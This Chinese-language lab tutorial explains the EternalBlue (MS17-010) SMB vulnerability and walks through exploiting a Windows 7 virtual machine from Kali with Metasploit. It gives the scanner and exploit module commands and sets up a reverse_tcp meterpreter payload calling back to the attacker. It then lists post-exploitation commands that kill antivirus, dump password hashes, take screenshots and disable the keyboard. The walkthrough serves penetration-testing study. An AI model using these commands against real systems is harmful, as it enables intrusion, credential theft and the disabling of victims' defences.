概述:

什么是“永恒之蓝”?

永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。

攻击原理:

恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

关于SMB协议:

SMB(全称是Server Message Block)是一个协议名,它能被用于Web连接和客户端与服务器之间的信息沟通。它的工作原理可以概括为:

(1):首先客户端发送一个SMB negport 请求数据报,,并列出它所支持的所有SMB的协议版本。服务器收到请求消息后响应请求,并列出希望使用的SMB协议版本。如果没有可以使用的协议版本则返回0XFFFFH,结束通信。

(2):协议确定后,客户端进程向服务器发起一个用户或共享的认证,这个过程是通过发送SessetupX请求数据包实现的。客户端发送一对用户名和密码或一个简单密码到服务器,然后通过服务器发送一个SessetupX应答数据包来允许或拒绝本次连接。

(3):当客户端和服务器完成了磋商和认证之后,它会发送一个Tcon或TconX SMB数据报并列出它想访问的网络资源的名称,之后会发送一个TconX应答数据报以表示此次连接是否接收或拒绝。

(4):连接到相应资源后,SMB客户端就能够通过open SMB打开一个文件,通过read SMB读取文件,通过write SMB写入文件,通过close SMB关闭文件。

参考:百度百科“SMB”;

实验环境:

  1. kali 2021(攻击机):192.168.40.130

  2. windows 7 家庭普通版 x64(靶机):192.168.40.131

  3. VMware 15.5

实验过程:

信息搜集:

使用nmap扫描端口信息

上图显示445端口为开启状态。

使用MSF框架

1
2
msfconsole
search ms17-010

这里的两个工具分别用来扫描漏洞以及利用漏洞(编号为1号和2号,图里框错了。。。)

使用扫描模块扫描靶机

1
2
msf6> use auxiliary/scanner/smb/smb_ms17_010
show options //查看需要配置的参数

上图RHOSTS代表探测主机的IP或IP范围,将它的值设置为靶机IP,执行扫描

1
2
set rhosts 192.168.40.131
run

扫描结果显示,靶机易受到ms17-010漏洞的攻击。

使用攻击模块展开攻击

使用攻击模块查看可攻击的系统

1
2
use exploit/windows/smb/ms17_010_eternalblue
show targets

查看攻击载荷

1
show payloads

该命令查看我们期望在靶机被渗透后完成实际功能的代码

设置参数

1
2
3
set rhosts 192.168.40.131 //设置目标ip
set payload windows/x64/meterpreter/reverse_tcp // 设置攻击载荷
set LHOST 192.168.40.130 //设置接收反弹的主机ip,默认为本机

关于Meterpreter命令,请参考https://www.cnblogs.com/backlion/p/9484949.html

执行攻击

1
exploit

后渗透阶段

运行expoit之后,开始监听本地(攻击机)4444端口,输入shell即可切换靶机shell,使用exit命令返回。

这里运行shell,运行ipconfig命令,即可看到靶机IP

持续攻击举例

  • 显示远程主机系统信息:sysinfo

  • 目标主机截图:screenshot

查看截图

  • 关闭杀毒软件:run killav

  • 获取用户密码:run hashdump

  • 禁止(允许)目标使用键盘:uictl disable(enable)keyboard